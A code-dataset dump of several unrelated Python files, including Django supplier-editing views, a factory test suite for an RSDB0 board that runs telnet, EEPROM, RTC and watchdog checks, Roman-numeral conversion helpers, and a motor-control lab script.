40f756004da71f05733139a24309c3462c7ec54b | 43d4b962a83dac734dfb09b8523fdfcfcc6628c1 | /lavajato_fornecedor/views.py | c245e3d77cf35444022eb95c2347a0cc74207d4f | [] | no_license | redcliver/sistemas | 01edd98c2814eee50550010169b2c7594e5256f5 | 1129c9516c57fbf53ce3cf5e0e5feb3835d3e9df | refs/heads/master | 2020-04-07T17:23:04.809752 | 2019-05-02T16:24:18 | 2019-05-02T16:24:18 | 158,567,651 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,460 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
from .models import fornecedor
# Create your views here.
def lavajato_fornecedor(request):
    """Render the "new supplier" form; on POST, persist the submitted supplier.

    Access is restricted to the authenticated 'dayson' account; any other
    visitor is sent to the generic error page.
    """
    if not request.user.is_authenticated():
        return render(request, 'sistema_login/erro.html', {'title': 'Erro'})
    if request.user.get_short_name() != 'dayson':
        return render(request, 'sistema_login/erro.html', {'title': 'Erro'})
    if request.method == 'POST' and request.POST.get('nome') is not None:
        name = request.POST.get('nome')
        # Build the supplier record straight from the form fields.
        novo_fornecedor = fornecedor(
            nome=name,
            telefone=request.POST.get('tel'),
            celular=request.POST.get('cel'),
            cpf=request.POST.get('cpf'),
            email=request.POST.get('mail'),
            endereco=request.POST.get('endereco'),
            numero=request.POST.get('numero'),
            bairro=request.POST.get('bairro'),
            cidade=request.POST.get('cidade'),
            uf_cidade=request.POST.get('uf_cidade'))
        novo_fornecedor.save()
        msg = name + " salvo com sucesso!"
        return render(request, 'lavajato_fornecedor/fornecedor_novo.html',
                      {'title': 'Novo Fornecedor', 'msg': msg})
    return render(request, 'lavajato_fornecedor/fornecedor_novo.html',
                  {'title': 'Novo Fornecedor'})
def busca(request):
    """Supplier lookup: list every supplier, or show one chosen via POST.

    Restricted to the authenticated 'dayson' account.
    """
    if not request.user.is_authenticated():
        return render(request, 'sistema_login/erro.html', {'title': 'Erro'})
    if request.user.get_short_name() != 'dayson':
        return render(request, 'sistema_login/erro.html', {'title': 'Erro'})
    fornecedores = fornecedor.objects.all().order_by('nome')
    if request.method == 'POST' and request.POST.get('fornecedor_id') is not None:
        fornecedor_obj = fornecedor.objects.get(id=request.POST.get('fornecedor_id'))
        return render(request, 'lavajato_fornecedor/fornecedor_visualiza.html',
                      {'title': 'Visualizar Fornecedor', 'fornecedor_obj': fornecedor_obj})
    return render(request, 'lavajato_fornecedor/fornecedor_busca.html',
                  {'title': 'Buscar Fornecedor', 'fornecedores': fornecedores})
def edita(request):
    """Supplier edit chooser: list suppliers, or open one in the edit form.

    Restricted to the authenticated 'dayson' account.
    """
    if not request.user.is_authenticated():
        return render(request, 'sistema_login/erro.html', {'title': 'Erro'})
    if request.user.get_short_name() != 'dayson':
        return render(request, 'sistema_login/erro.html', {'title': 'Erro'})
    fornecedores = fornecedor.objects.all().order_by('nome')
    if request.method == 'POST' and request.POST.get('fornecedor_id') is not None:
        fornecedor_obj = fornecedor.objects.get(id=request.POST.get('fornecedor_id'))
        return render(request, 'lavajato_fornecedor/fornecedor_edita.html',
                      {'title': 'Editar Fornecedor', 'fornecedor_obj': fornecedor_obj})
    return render(request, 'lavajato_fornecedor/fornecedor_busca_edita.html',
                  {'title': 'Editar Fornecedor', 'fornecedores': fornecedores})
def salva(request):
    """Persist edits to an existing supplier posted from the edit form.

    A POST carrying 'fornecedor_id' copies every form field onto the
    matching record and saves it; otherwise the search-to-edit page is
    re-rendered.  Restricted to the authenticated 'dayson' account.
    """
    if request.user.is_authenticated():
        empresa = request.user.get_short_name()
        if empresa == 'dayson':
            fornecedores = fornecedor.objects.all().order_by('nome')
            if request.method == 'POST' and request.POST.get('fornecedor_id') != None:
                fornecedor_id = request.POST.get('fornecedor_id')
                fornecedor_obj = fornecedor.objects.get(id=fornecedor_id)
                nome = request.POST.get('nome')
                tel = request.POST.get('tel')
                cel = request.POST.get('cel')
                cpf = request.POST.get('cpf')
                mail = request.POST.get('mail')
                endereco = request.POST.get('endereco')
                numero = request.POST.get('numero')
                bairro = request.POST.get('bairro')
                cidade = request.POST.get('cidade')
                uf_cidade = request.POST.get('uf_cidade')
                bloqueado = request.POST.get('bloqueado')
                fornecedor_obj.nome = nome
                fornecedor_obj.telefone = tel
                fornecedor_obj.celular = cel
                fornecedor_obj.cpf = cpf
                fornecedor_obj.email = mail
                fornecedor_obj.endereco = endereco
                fornecedor_obj.numero = numero
                fornecedor_obj.bairro = bairro
                fornecedor_obj.cidade = cidade
                fornecedor_obj.uf_cidade = uf_cidade
                # Note: the 'bloqueado' form field is stored on the model's
                # `estado` attribute.
                fornecedor_obj.estado = bloqueado
                fornecedor_obj.save()
                msg = fornecedor_obj.nome + " editado(a) com sucesso!"
                return render(request, 'lavajato_fornecedor/fornecedor_edita.html', {'title':'Editar Fornecedor', 'fornecedor_obj':fornecedor_obj, 'msg':msg})
            return render(request, 'lavajato_fornecedor/fornecedor_busca_edita.html', {'title':'Editar Fornecedor', 'fornecedores':fornecedores})
        return render(request, 'sistema_login/erro.html', {'title':'Erro'})
    else:
        return render(request, 'sistema_login/erro.html', {'title':'Erro'})
"igor-peres@hotmail.com"
] | igor-peres@hotmail.com |
5669ab57cd6e854011e0316c92d47d11d5c14dc9 | e27993d156265e293b0ed0eed7136a1080edcee5 | /timetabler/__init__.py | d0fb1141365f857a8a3e190dcbde2531149eb39a | [
"MIT"
] | permissive | jordannoble/icmaths-timetabler | 6a88f3e49f61b0887510a5f99b7fa90a61f0a583 | d86f9551905e046ec9df6599f656d5bf40f62263 | refs/heads/master | 2016-09-05T12:47:00.380568 | 2014-09-26T07:59:18 | 2014-09-26T07:59:18 | 23,847,615 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 71 | py | from flask import Flask
# Module-level Flask application object shared by the package.
app = Flask(__name__)
# Imported for its side effects: presumably registers routes on `app`,
# which is why it must come after `app` is created (the usual Flask
# circular-import pattern) -- verify in timetabler/views.py.
import timetabler.views
| [
"jn610@imperial.ac.uk"
] | jn610@imperial.ac.uk |
ac3a413222f1c781a87ae64071c11456543630e3 | 71764665e27f4b96bab44f38a4a591ffc2171c24 | /hhplt/productsuite/RD50C/auto_test1.py | 343f405b2ee4ee990bbf72e929d2d148330595b7 | [] | no_license | kingdomjc/RSU_production_VAT | 693f8c504acc0cc88af92942734ccb85f7e7d7c0 | 9a3d6d3f5a5edfaf30afdff725661630aafe434c | refs/heads/master | 2020-07-31T05:03:46.699606 | 2019-09-24T02:09:53 | 2019-09-24T02:09:53 | 210,491,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,235 | py | #encoding:utf-8
u'''本工位测试前请先在测试PC上运行APP版本下载服务程序TFTPSRV.EXE;
1、被测RSDB0单板通过排线连接作为工装的RSIB0板(LED&PSAM卡面板)、测试串口线、网口连接网线;
2、RSDB0单板上电;
3、根据VAT提示按下单板上复位按钮S1;
4、面板灯测试项需人工观察判断面板灯运行情况。
'''
import socket
import serial
from hhplt.deviceresource.checkVersion import VersionManager
from hhplt.productsuite.RD50C import downloadEPLD
from hhplt.testengine.server import ServerBusiness
suiteName = u'''RSDB0单板功能测试工位'''
version = "1.0"
failWeightSum = 10 #整体不通过权值,当失败权值和超过此,判定测试不通过
import binascii
import os
import re
import telnetlib
from hhplt.deviceresource.RD50CAutoTestMyd import PsamProxy, DeviceProxy, RTCProxy, MACProxy, PCIEProxy
from hhplt.testengine.testcase import superUiLog, uiLog
from hhplt.testengine.exceptions import TestItemFailException,AbortTestException
from hhplt.deviceresource import RD50CDownloadNetMyd
import time
from hhplt.deviceresource import TestResource, askForResource
from hhplt.parameters import PARAM
import hhplt.testengine.manul as manul
from hhplt.testengine.manul import askForSomething, manulCheck
import manual_test
#串口夹具开合触发器
#测试函数体例:T_<序号>_方法名
#_A为自动完成测试,_M为人工测试;函数正常完成,返回值为输出数据(可空);异常完成,抛出TestItemFailException异常,含输出(可选)
#函数的doc中,<测试名称>-<描述>
#可选的两个函数:setup(product)和rollback(product),前者用于在每次测试开始前(不管选择了多少个用例)都执行;后者当测试失败(总权值超出)后执行
def __checkManualFinished(idCode):
    '''Abort unless the RSDB0 power & BOOT download station already passed
    for the board identified by `idCode`.'''
    with ServerBusiness(testflow = True) as sb:
        status = sb.getProductTestStatus(productName="RD50C_RSU" ,idCode = idCode)
        # No record at all means the board never went through board test.
        if status is None:
            raise AbortTestException(message=u"RSDB0尚未进行单板测试,RSDB0单板功能测试终止")
        else:
            # The upstream suite must be present in the record and marked PASS.
            sn1 = downloadEPLD.suiteName
            if sn1 not in status["suiteStatus"] or status["suiteStatus"][sn1] != 'PASS':
                raise AbortTestException(message=u"RSDB0单板电源&BOOT下载测试项未进行或未通过,RSDB0单板功能测试终止")
def pingIPOpen(pingIP):
data = os.popen('ping %s' % pingIP).readlines()
print data
for line in data:
if re.search(r'TTL=', line, re.I):
return "ok"
return "no"
def __doorDog():
    # Exercise the hardware watchdog via the fixture; returns its status string.
    sc = __askForPlateDeviceCom() # acquire the GS10PlateDevice resource
    downNet = sc.doorDog()
    return downNet
def __askForPlateDeviceCom():
    '''Acquire the plate-device (fixture board) resource on the default COM port.'''
    sc = askForResource('RD50CPlateDevice', RD50CDownloadNetMyd.GS10PlateDevice,
        serialPortName = PARAM["defaultCOMPort"],
        cableComsuption = 1)
    return sc
def __downloadVersion():
    # Download the APP version image through the fixture (None = default file).
    sc = __askForPlateDeviceCom() # acquire the GS10PlateDevice resource
    versionFile = None
    downNet = sc.downloadVersion(version_file=versionFile)
    return downNet
def T_01_scanCode_A(product):
    u'扫码条码-扫描条码'
    # Prompt the operator to scan the board barcode, verify the upstream
    # power&BOOT station passed for it, then register it for this test run.
    # (The u'...' docstring above is parsed by the test framework as
    # "<name>-<description>" -- do not change it.)
    barCode = askForSomething(u'扫描条码', u'请扫描RSDB0单板条码', autoCommit=False)
    __checkManualFinished(barCode)
    product.setTestingProductIdCode(barCode)
    product.setTestingSuiteBarCode(barCode)
    return {u"RSDB0单板条码": barCode}
def T_02_downloadNet1_A(product):
    u'单板网口测试-RSDB0单板网口通信功能及APP版本下载测试'
    # Ask the operator to press the reset button, then attempt the APP
    # download over the network port.  A "loginfail" (no serial output)
    # is retried once before failing; other failures abort immediately.
    retry = ""
    t = 0
    while True:
        t += 1
        powerResult = manulCheck(u'复位', u'%s请在点击确定按钮后,按下单板上的复位按键S1'%retry,check="ok")
        if powerResult:
            downNet = __downloadVersion()
            if downNet == "OK":
                return
            elif downNet == "loginfail":
                retry = "登录超时,请重新操作,"
                if t == 2:
                    raise TestItemFailException(failWeight=10, message=u'串口无打印')
            elif downNet == "TFTPfail":
                # retry = "TFTP开启失败,请重新操作,"
                # continue
                raise TestItemFailException(failWeight=10, message=u'APP版本下载失败, 可能是没有打开TFTP')
            else:
                raise TestItemFailException(failWeight=10, message=u'BOOT下载失败,未知异常')
def myReadMac():
    # Read the 6-byte MAC from EEPROM offset 0x46 and return it as a
    # 12-character lowercase hex string.  Raises TestItemFailException on
    # any proxy error; always closes the proxy.
    macoffset = 0x46
    proxy = MACProxy(PARAM["defaultNetOneIp"])
    try:
        readMac = proxy.readEeprom(macoffset, 6)
        # hexlify the whole 6-byte buffer in one call instead of slicing
        # and hexlifying byte by byte -- identical output for 6 bytes.
        return binascii.hexlify(readMac[0:6])
    except:
        raise TestItemFailException(failWeight=10, message=u"读取mac失败,EEPROM测试失败")
    finally:
        proxy.close()
def myWriteMac(macstr):
    # Write the 12-hex-char MAC string `macstr` to EEPROM offset 0x46.
    # The connection is probed up to 25 times, 10 s apart (the board may
    # still be booting); the for/else raises if no attempt succeeds.
    macoffset = 0x46
    proxy = MACProxy(PARAM["defaultNetOneIp"])
    for i in range(25):
        try:
            print "读个看看%d" % i
            proxy.initResource()
            proxy.readEeprom(0x27, 12)
            break
        except:
            time.sleep(10)
    else:
        proxy.close()
        raise TestItemFailException(failWeight=10, message=u"建立连接失败,EEPROM测试失败")
    try:
        macLast = binascii.unhexlify(macstr)
        proxy.writeEeprom(macoffset, macLast)
    except:
        raise TestItemFailException(failWeight=10, message=u"写入mac失败,EEPROM测试失败")
    finally:
        proxy.close()
def T_03_MACTest_A(product):
    u'EEPROM测试-EEPROM读写测试'
    # Round-trip check: write a known pattern, read it back, compare.
    myWriteMac("A1A1A1A1A1A1")
    macstrRead2 = myReadMac()
    if macstrRead2.upper() == "A1A1A1A1A1A1":
        return {u"EEPROM测试":u"EEPROM读写成功"}
    raise TestItemFailException(failWeight=10, message=u"写入与分配mac不一致,EEPROM测试失败")
def T_04_checkVersionTest_A(product):
    u"查询版本号-查询版本号"
    # Query app/system version numbers; "sysRuning" selects which bank
    # (sys0/sys1) is the active system and which is standby.
    sc = VersionManager(PARAM["defaultNetOneIp"])
    # sc = __askForCheckVersion()
    try:
        ret = sc.queryVersion()
    except:
        raise TestItemFailException(failWeight=1, message=u"版本获取失败")
    finally:
        sc.close()
    if ret["sysRuning"] == 0:
        sysVersion = ret["sys0VersionNum"]
        sysStandby = ret["sys1VersionNum"]
    else:
        sysVersion = ret["sys1VersionNum"]
        sysStandby = ret["sys0VersionNum"]
    return{u"应用版本号":ret["appRuningVersionNum"],u"系统版本号":sysVersion,u"备用系统版本号":sysStandby}
def T_05_PSAMTest_A(product):
    u'PSAM卡接口测试-RSDB0单板连接RSIB0单板进行4个PSAM卡接口测试'
    # Activate each of the four PSAM slots, then run one SELECT APDU
    # against every slot that activated.  Slots that fail activation are
    # collected and reported together at the end.
    errorList = []
    # proxy = __askForRD50CNet1()
    proxy = PsamProxy(PARAM["defaultNetOneIp"])
    command = "00a4000002df01"
    try:
        for slot in range(4):
            ack = proxy.active(slot)
            if ack[0:4] != "e800":
                superUiLog(u"PSAM卡槽[%d]激活失败"%(slot+1) + ack)
                errorList.append(str(slot+1))
                continue
            else:
                superUiLog(u"PSAM卡槽[%d]激活成功"%(slot+1) + ack[4:])
            ackRead = proxy.exchangeApdu(slot, command)
            if ackRead[0:4] != "e900":
                # Bug fix: log the APDU response (ackRead), not the earlier
                # activation response (ack) that was logged before.
                uiLog(u"命令执行失败 " + ackRead)
            else:
                uiLog(u"命令执行成功 " + ackRead[4:])
    finally:
        proxy.close()
    if errorList != []:
        PARAM["failNum"] = "1"
        raise TestItemFailException(failWeight=1, message=u'PSAM卡槽%s激活失败' % ",".join(errorList))
    return
def T_06_lightTest_M(protduct):
    u"面板灯接口测试-RSDB0单板连接RSIB0单板进行单板面板灯接口测试"
    # Operator visually confirms each panel LED.  From the writes below:
    # EPLD register 0xda appears to drive the ALM LED (0 = blink, 1 = off)
    # and 0x17c the ANT1-ANT6 LEDs (0x00 = all on, 0x3f = all off) --
    # confirm against the EPLD register map.
    LightDict = {"系统PWR":"长亮","系统RUN":"闪烁","系统SAM":"长亮"}
    alist = []
    for alight in LightDict:
        lightResult = manulCheck(u"面板灯接口测试", u"请观察%s灯是否%s"%(alight,LightDict[alight]))
        if lightResult:
            continue
        alist.append(alight)
    # proxy = __askForRD50CLight()
    proxy = DeviceProxy(PARAM["defaultNetOneIp"])
    try:
        epld_addr = int(str("da"), 16)
        epld_value = int(str("0"), 16)
        proxy._write_epld(epld_addr, epld_value)
        redlightResult = manulCheck(u"系统报警灯", u"请观察系统ALM灯是否闪烁,点击正常后ALM灯将会关闭")
        if redlightResult:
            epld_addr1 = int(str("da"), 16)
            epld_value1 = int(str("1"), 16)
            proxy._write_epld(epld_addr1, epld_value1)
        else:
            # Record the failure but still switch the ALM LED back off.
            alist.append("系统ALM")
            epld_addr1 = int(str("da"), 16)
            epld_value1 = int(str("1"), 16)
            proxy._write_epld(epld_addr1, epld_value1)
        time.sleep(0.5)
        epld_addr1 = int(str("17c"), 16)
        epld_value1 = int(str("00"), 16)
        proxy._write_epld(epld_addr1, epld_value1)
        sixlightResult = manulCheck(u"led灯亮起提示", u"led灯ANT1-ANT6是否亮起,判断后会关闭led灯")
        if sixlightResult:
            epld_addr1 = int(str("17c"), 16)
            epld_value1 = int(str("3f"), 16)
            proxy._write_epld(epld_addr1, epld_value1)
        else:
            # Record the failure but still switch the ANT LEDs back off.
            alist.append("ANT1-ANT6灯")
            epld_addr1 = int(str("17c"), 16)
            epld_value1 = int(str("3f"), 16)
            proxy._write_epld(epld_addr1, epld_value1)
    finally:
        proxy.close()
    if alist:
        cir = ",".join(alist)
        PARAM["failNum"] = "1"
        raise TestItemFailException(failWeight=1, message=u"%s测试不正常" % cir)
    return
def _T_07_PCIETest_A(product):
    u"PCIE测试-PCIE测试"
    # Leading-underscore name: excluded from the active test list.
    # Sends one PCIE exchange and fails on any proxy error.
    proxy = PCIEProxy(PARAM["PCIEIp"])
    try:
        recvResult = proxy.sendPcie()
        print recvResult
    except:
        raise TestItemFailException(failWeight=10, message=u"PCIE测试失败")
    finally:
        proxy.close()
def T_07_carDetection_A(protduct):
    u"车检串口-车检串口"
    # Vehicle-detector port test: write 0x7 to EPLD 0xd4, have the operator
    # plug/unplug the fixture connector, then read back EPLD 0x90 and
    # expect 0xc0; finally pulse EPLD 0xd2 (1 then 0 after 0.5 s).
    proxy = DeviceProxy(PARAM["defaultNetOneIp"])
    try:
        epld_addr = int(str("d4"), 16)
        epld_value = int(str("7"), 16)
        proxy._write_epld(epld_addr, epld_value)
        pullOutResult = manulCheck(u"提示", u"请再车检插口的工装接口插拔之后,点击确定")
        if pullOutResult:
            read_epld_addr = int(str("90"), 16)
            readResult = proxy._read_epld(read_epld_addr)
            readResult = hex(readResult)[2:]
            print readResult
            if readResult != "c0":
                proxy.close()
                PARAM["failNum"] = "1"
                raise TestItemFailException(failWeight=1, message=u"车检口测试失败,错误码%s"%readResult)
            epld_addr1 = int(str("d2"),16)
            epld_value1 = int(str("1"),16)
            epld_value2 = int(str("0"),16)
            proxy._write_epld(epld_addr1, epld_value1)
            time.sleep(0.5)
            proxy._write_epld(epld_addr1, epld_value2)
    finally:
        proxy.close()
def _T_08_serialPort_A(product):
    u"串口测试-串口测试"
    # Leading-underscore name: excluded from the active test list.
    # Telnets into the board, captures /dev/ttyS1 into myd.txt, writes
    # test lines over the local serial port, then counts captured lines.
    time.sleep(10)
    ip1 = PARAM["defaultNetOneIp"]
    tn = telnetlib.Telnet(ip1, port=23, timeout=10)
    try:
        tn.set_debuglevel(2)
        tn.read_until('login: ')
        tn.write('rsu_c\r')
        tn.read_until('Password: ')
        tn.write('shhic357\r')
        tn.read_until("#")
        tn.write('cat /dev/ttyS1 > myd.txt & \n')
        tn.read_until("#")
        se = serial.Serial(PARAM["serialPort"], 115200)
        for i in range(4):
            # NOTE(review): ("%s\n" % "mynameisco") * 10 -- the whole line,
            # newline included, is repeated 10 times per write because of
            # operator precedence.  The pass criterion below only requires
            # a nonzero line count, so this still works; confirm intent.
            se.write("%s\n"%"mynameisco"*10)
            time.sleep(2)
        se.close()
        tn.write("wc -l myd.txt\n")
        b = tn.read_until("#", 4)
        # First character of the wc output line == leading digit of the count.
        l = b.split("\n")[1].strip()[0]
        print l
    except:
        raise AbortTestException(message=u"请检查工装连接是否正常")
    finally:
        tn.close()
    # for i in l:
    #     if "4 myd.txt" in i:
    #         return {u"串口测试": u"成功"}
    if int(l) > 0:
        return {u"串口测试": u"成功,%s"%l}
    else:
        raise TestItemFailException(failWeight=10, message=u'串口测试失败')
def T_09_RTCTest_A(product):
    u"RTC时钟测试-RSDB0单板RTC时钟时间设置测试"
    # Set the board RTC to the current local time, read it back, and
    # require an exact field-for-field match.
    setList =[]
    tmList = []
    timeNow = time.localtime()
    set_year = int(timeNow[0])
    set_mon = int(timeNow[1])
    set_day = int(timeNow[2])
    set_wday = int(timeNow[6])
    set_hour = int(timeNow[3])
    set_min = int(timeNow[4])
    set_sec = int(timeNow[5])
    proxy = RTCProxy(PARAM["defaultNetOneIp"])
    try:
        proxy.rtc_init()
        proxy.rtc_set(set_year,set_mon,set_day,set_wday,set_hour,set_min,set_sec)
        setList.extend((set_year,set_mon,set_day,set_wday,set_hour,set_min,set_sec))
        ack = proxy.rtc_read()
    except:
        raise TestItemFailException(failWeight=1, message=u'RTC时钟设置失败')
    finally:
        proxy.close()
    # The read-back payload is eight big-endian 32-bit fields:
    # status, sec, min, hour, mday, mon, year, wday.
    rtc_time = binascii.hexlify(ack)
    ret = int(rtc_time[0:8], 16)
    tm_sec = int(rtc_time[8:16], 16)
    tm_min = int(rtc_time[16:24], 16)
    tm_hour = int(rtc_time[24:32], 16)
    tm_mday = int(rtc_time[32:40], 16)
    tm_mon = int(rtc_time[40:48], 16)
    tm_year = int(rtc_time[48:56], 16)
    tm_wday = int(rtc_time[56:64], 16)
    tmList.extend((tm_year, tm_mon, tm_mday, tm_wday, tm_hour, tm_min, tm_sec))
    print "tmList",tmList
    if ret == 0:
        print "get rtc time: %d-%d-%d,%d,%d:%d:%d \r\n" % (tm_year, tm_mon, tm_mday, tm_wday, tm_hour, tm_min, tm_sec)
    if setList == tmList:
        return
    else:
        PARAM["failNum"] = "1"
        raise TestItemFailException(failWeight=1, message=u'RTC时钟设置失败')
def T_10_doorDogTest_A(product):
    u"看门狗测试-RSDB0单板硬件看门狗测试"
    # Kill the watchdog-feeding process (/usr/bin/wtd) over telnet, then
    # check via the fixture that the hardware watchdog fires.
    ip1 = PARAM["defaultNetOneIp"]
    tn = telnetlib.Telnet(ip1, port=23, timeout=10)
    try:
        tn.set_debuglevel(2)
        # enter the login user name
        tn.read_until('login: ')
        tn.write('rsu_c\r')
        # enter the login password
        tn.read_until('Password: ')
        tn.write('shhic357\r')
        # after logging in, run the command
        tn.read_until("# ")
        tn.write('ps\n')
        psProcess = tn.read_until("/usr/bin/wtd")
        pslist = psProcess.split("\n")
        for oneProcess in pslist:
            if "usr/bin/wtd" in oneProcess:
                doorProcess = oneProcess.strip().split(" ")
                break
        else:
            # NOTE(review): this raise is inside the try, so the broad
            # `except` below catches it and re-raises as u'看门狗测试失败',
            # masking the more specific message -- confirm intent.
            raise TestItemFailException(failWeight=10, message=u'没有喂狗进程')
        tn.write("kill %s\n" % doorProcess[0])
        time.sleep(2)
    except:
        raise TestItemFailException(failWeight=10, message=u'看门狗测试失败')
    finally:
        tn.close()
    sc = __doorDog()
    if sc == "ok":
        return {u"看门狗测试":u"成功"}
    else:
        raise TestItemFailException(failWeight=10, message=u'看门狗失效')
| [
"929593844@qq.com"
] | 929593844@qq.com |
d64582191948248f5a9180c22d26c6bc08d3fe1a | cc60cd7cf8ce77e2f29f41c7778f1c4f04240287 | /cfgov/regulations3k/scripts/integer_conversion.py | 5df0b2a09734998a21be9c9515005fdeff624ade | [
"CC0-1.0"
] | permissive | atuggle/cfgov-refresh | bd0236a36ad27da37abcfe97c283a0e0f66a6645 | 5a9cfd92b460b9be7befb39f5845abf56857aeac | refs/heads/master | 2020-03-16T16:01:12.474154 | 2018-06-08T17:50:14 | 2018-06-11T16:42:56 | 132,768,327 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,738 | py | from __future__ import unicode_literals
import string
def roman_to_int(roman):
    """
    Convert a unicode lowercase Roman numeral to an integer.

    Returns None for non-string input, for strings containing non-Roman
    characters, and for strings that are not the canonical spelling of a
    number in [1, 3999] (including the empty string).

    This is python3-compliant and assumes unicode strings. So if you test
    either function in Python2 in a Django shell, be sure to import
    unicode_literals or use explicit unicode strings, such as u'iii'.
    """
    if not isinstance(roman, type("")):
        return
    nums = {'m': 1000, 'd': 500, 'c': 100, 'l': 50, 'x': 10, 'v': 5, 'i': 1}
    total = 0
    for i in range(len(roman)):
        try:
            value = nums[roman[i]]
            # Subtractive notation: a smaller digit before a larger one
            # (e.g. 'iv') is subtracted instead of added.
            if i + 1 < len(roman) and nums[roman[i + 1]] > value:
                total -= value
            else:
                total += value
        except KeyError:
            return
    # Bug fix: the round-trip check below raises ValueError for totals
    # outside int_to_roman's domain (e.g. roman_to_int('') -> 0, or
    # 'mmmm' -> 4000).  Reject such inputs instead of crashing.
    if total < 1 or total > 3999:
        return
    # Only canonical spellings are accepted ('iiii' is rejected).
    if int_to_roman(total) == roman:
        return total
    else:
        return


def int_to_roman(num):
    """Convert an integer to a lowercase Roman numeral, as used in regs."""
    if not isinstance(num, type(1)):
        raise TypeError("Expected integer, got {}".format(type(num)))
    if num < 1 or num > 3999:
        raise ValueError("Argument must be between 1 and 3999")
    # Value/numeral pairs in descending order, including subtractive forms.
    int_values = (1000, 900, 500, 400, 100, 90, 50, 40,
                  10, 9, 5, 4, 1)
    numerals = ('m', 'cm', 'd', 'cd', 'c', 'xc', 'l', 'xl',
                'x', 'ix', 'v', 'iv', 'i')
    result = []
    for i in range(len(int_values)):
        count = int(num / int_values[i])
        result.append(numerals[i] * count)
        num -= int_values[i] * count
    return ''.join(result)
def alpha_to_int(alpha):
    """
    Return a letter's place in the alphabet, or None.

    Double letters ('aa'..'zz') map to a second alphabet starting at 27.
    Mixed-case input ('Aa'), non-letters and non-strings yield None.
    """
    if not isinstance(alpha, type('')):
        return None
    # Accept all-lowercase or all-uppercase only, so mixed-case double
    # letters are rejected.
    if not alpha.islower() and not alpha.isupper():
        return None
    positions = {}
    for index, letter in enumerate(string.ascii_lowercase, start=1):
        positions[letter] = index
        positions[letter * 2] = index + 26
    return positions.get(alpha.lower())
def int_to_alpha(num):
    """Return the lowercase letter(s) at a position in the alphabet, or None.

    Positions 1-26 map to 'a'-'z'; positions 27-52 map to the doubled
    letters 'aa'-'zz'; anything else yields None.
    """
    lookup = {}
    for offset, letter in enumerate(string.ascii_lowercase):
        lookup[offset + 1] = letter
        lookup[offset + 27] = letter + letter
    return lookup.get(num)
| [
"noreply@github.com"
] | atuggle.noreply@github.com |
005465f20680fb4a6b902a62c9c1f39bd408de7d | 505b766aeef6dae5fdb2cab9f2550543179e10e9 | /app/keyvalue/models.py | ca70f4fd07e1a6862c13073c71802ea54c71b626 | [] | no_license | tossedwarrior/wri | 19b912630d00f64bcccc499ba22418c73c7bf359 | 0d4a0f9d7c36b04f87c7cf0ec42db4a57698137f | refs/heads/master | 2020-12-25T19:27:19.028235 | 2012-06-13T21:03:11 | 2012-06-13T21:03:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 837 | py | # -*- encoding: utf-8 -*-
import os
from datetime import datetime
# When running under the App Engine dev server, define Django-backed
# stand-ins that mimic the datastore API; otherwise pull the real
# implementations from models_appengine.
if 'SERVER_SOFTWARE' in os.environ and os.environ['SERVER_SOFTWARE'].startswith('Dev'):
    from django.db import models
    class JSONData(models.Model):
        # Raw JSON payload stored as text; defaults to an empty list.
        json = models.TextField(default='[]')
        @staticmethod
        def get_by_id(id):
            return JSONData.objects.get(pk=id)
        def put(self):
            # Mirror the App Engine datastore `put()` on top of Django save().
            self.save()
        def unique_id(self):
            return self.id
    class Error(models.Model):
        # Free-form error log entry with a creation timestamp.
        error = models.TextField(default='')
        when = models.DateTimeField(default=datetime.now)
        @staticmethod
        def track(log):
            Error(error=log).save();
        @staticmethod
        def latest():
            # Ten most recent errors, newest first.
            return Error.objects.order_by('-when')[:10]
else:
    from models_appengine import *
"qualopec@gmail.com"
] | qualopec@gmail.com |
3df3cc440edbedcb09a8d9893fc736d44be48203 | c1fc5402903bdb2f94b319756538f61ee63f329a | /controlsMotorLab.py | bdb16ab3a88f5ceb583df67e03fd46b98b9bd744 | [] | no_license | itdaniher/controlsNotebook | 1951a137f0f33d43389723efb520be88f3802cbe | bfe8bf4cb43de402debf6df5d3c29491dc80727d | refs/heads/master | 2016-09-10T11:48:53.474372 | 2014-11-24T22:39:10 | 2014-11-24T22:39:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,746 | py | from __future__ import division
import connectClient
import time
from scipy.interpolate import *
from pylab import *
import numpy
cee = connectClient.CEE()
# set a sample rate of 40,000 samples per second
cee.setSampleRate(40)
# for four quadrant operation, use a "zero" point of 2v5
zero = 2.5
def getCounters():
    """Read the two 16-bit counters (sample counter, encoder position)
    from the CEE over a USB control transfer."""
    # get four bytes from xmega onboard cee
    data = cee.dev.ctrl_transfer(0x80 | 0x40, 0x10, 0, 0, 4)
    # ticks are time increments of units samples
    # NOTE(review): callers disagree on the tuple order -- getRPS treats
    # element 0 as position ticks, while ACAnalysis treats element 1 as
    # time.  Confirm which 16-bit word is which against the firmware.
    sampleCounter = data[1] << 8 | data[0]
    position = data[3] << 8 | data[2]
    return sampleCounter, position
def getRPS(dt = .1):
    """Estimate rotations per second from two counter readings `dt`
    seconds apart (1088 encoder ticks per rotation)."""
    # catch overflow of 16b timer/counters by comparing two subsequent values
    def catchOverflow(a_v, b_v):
        # true division is in effect (__future__ import), so 3/4 == 0.75
        if (a_v > (2**16)*(3/4)) and (b_v < (2**16)*(1/4)):
            b_v += 2**16
        return a_v, b_v
    # getCounters
    a_t, a_s = getCounters()
    # wait
    time.sleep(dt)
    # getCounters
    b_t, b_s = getCounters()
    # clean
    a_t, b_t = catchOverflow(a_t, b_t)
    a_s, b_s = catchOverflow(a_s, b_s)
    try:
        assert b_s > a_s
    except:
        # NOTE(review): retries recursively with no depth bound; a stuck
        # sample counter would recurse until the recursion limit is hit.
        return getRPS(dt)
    # normalize position data
    rotations = (b_t-a_t)/1088
    # normalize time data
    duration = (b_s-a_s)*cee.devInfo['sampleTime']
    # rps = rotations / duration
    rps = rotations / duration
    return rps
def getDCSample(v, dt = .1):
    """Drive channel B at `zero`+v volts, then return one steady-state
    sample dict: measured voltage (re-zeroed), current, and speed (rps)."""
    ss = cee.setOutputConstant('b', 'v', zero+v)['startSample']
    (v, i) = cee.getInput('b', resample=dt, count=1, start = ss+int(dt/cee.devInfo['sampleTime']))
    v = v - zero
    dw = getRPS(dt)
    return {'v':v, 'i':i, 'dw':dw}
